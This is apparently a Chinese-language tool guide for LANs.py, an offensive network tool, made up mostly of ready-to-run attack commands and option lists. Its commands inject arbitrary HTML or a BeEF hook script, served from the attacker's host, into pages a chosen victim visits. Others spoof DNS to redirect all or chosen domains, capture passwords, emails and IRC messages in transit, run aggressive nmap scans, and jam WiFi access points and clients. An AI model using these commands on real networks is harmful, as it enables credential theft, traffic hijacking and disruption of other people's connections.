LANs.py:一款可以實現程式碼注入,無線滲透和WiFi使用者監控的強大工具
LANs.py功能簡介
1. 自動尋找當前網路中最為活躍的WLAN使用者,並對其中的一名使用者實施監控,然後向該使用者所訪問的Web頁面注入任意HTML或JavaScript程式碼;
2. 干擾附近的WiFi網路,干擾範圍取決於無線網絡卡的效能。我們可以通過修改配置來實現干擾所有人的WiFi訊號或僅干擾某一特定使用者的WiFi訊號。但是LANs.py不支援對使用者同時進行WiFi干擾和監聽。
依賴元件
Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標使用者的IP地址,那麼你還需要一塊支援混雜模式的無線網絡卡)
測試環境為Kali Linux,發動攻擊的裝置地址為192.168.0.5,目標裝置的IP地址為192.168.0.10。
所有的可選操作項:
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
[-rmac ROUTERMAC ] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
[-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
[--directedonly] [--accesspointACCESSPOINT]
工具使用
目前該工具支援從以下協議收集資料:HTTP、FTP、IMAP、POP3和IRC。LANs.py將會打印出URL地址所返回的資源中前135個字元,並自動忽略結尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協議下傳輸的使用者名稱/密碼、以及接收或傳送的電子郵件和IRC訊息。
常用命令:
python LANs.py -u -p
其他常用命令:
python LANs.py -u -p -d -ip 192.168.0.10
-d:檢視所有的圖片
-ip:設定目標IP地址
HTML注入:
python LANs.py -bhttp://192.168.0.5:3000/hook.js
向目標使用者所訪問的頁面中注入一個BeEF鉤子(http://beefproject.com/,【參考教程】),注入的引數會包裹在<script>標籤中,所以你可以在一個JavaScript檔案中的任意位置輸入內容。
python LANs.py -c'<title>Owned.</title>'
向目標使用者所訪問的頁面中注入任意HTML程式碼。工具首先會嘗試在第一個<head>標籤之後注入內容,如果失敗則嘗試在第一個</head>標籤之前注入內容。上面給出的示例程式碼會將頁面標題(title)修改為’Owned.’。
讀取pcap檔案:
python LANs.py -pcap libpcapfilename -ip192.168.0.10
為了成功讀取pcap檔案中的內容,你需要使用-ip引數指定目標IP。該功能的一個優點就是使用者無需使用root許可權便可執行該指令碼。
DNS欺騙:
python LANs.py -a -r 80.87.128.67
-a選項將會對目標發出的每一次DNS請求進行欺騙攻擊,並將使用者請求重定向至-r引數所制定的地址。無論使用者在位址列中輸入的是什麼地址,他們都將會被重定向到stallman.org(80.87.128.67)。
python LANs.py -dns eff.org
該命令將會對域名eff.org及其子域名進行DNS欺騙。
其他使用:
python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10
干擾所有的WiFi網路:
python LANs.py --jam
僅干擾指定接入點:
python Lans.py --jam --accesspoint01:MA:C0:AD:DY
所有的可用選項
常規使用:
-b BEEF_HOOK_URL:將BeEF hookURL注入到目標使用者所訪問的每一個頁面中,例如-bhttp://192.168.1.10:3000/hook.js。
-c ‘HTML CODE’:向目標使用者訪問的頁面中注入任意HTML程式碼。
-d:檢視目標使用者訪問的圖片。
-dns DOMAIN:對指定DNS域名進行DNS欺騙攻擊,例如-dnsfacebook.com。
-a:對使用者的所有DNS請求進行DNS欺騙攻擊。
-r IPADDRESS: 僅用於-dnsDOMAIN選項。
-u:打印出目標使用者所使用的URL地址。
-i INTERFACE: 指定介面,例如-i wlan0。
-ip:指定目標IP地址。
-n: 對目標執行nmap掃描。
-na:在後臺對目標執行更具攻擊性的nmap掃描,並將掃描結果輸出到[victim IP address].nmap.txt。
-p:打印出FTP/IMAP/POP/IRC/HTTP協議下傳輸的使用者名稱/密碼、以及接收或傳送的電子郵件和IRC訊息。
-pcap PCAP_FILE: 解析pcap檔案中所有的資料包; 需要輸入-ip[target's IP address]引數。
-rmac ROUTER_MAC:指定路由器的MAC地址。
-rip ROUTER_IP:指定路由器的IP地址。
–jam:對2.4GHz無線接入點以及客戶端進行干擾攻擊。
WiFi干擾:
-sMAC_Address_to_skip:指定需跳過的MAC地址。
-m MAXIMUM: 指定攻擊客戶端的最大數量。
-t TIME_INTERVAL: 設定攻擊間隔。
–packets NUMBER:指定每一次攻擊中傳送的資料包數量。
–accesspoint ROUTER_MAC:輸入目標AP的MAC地址。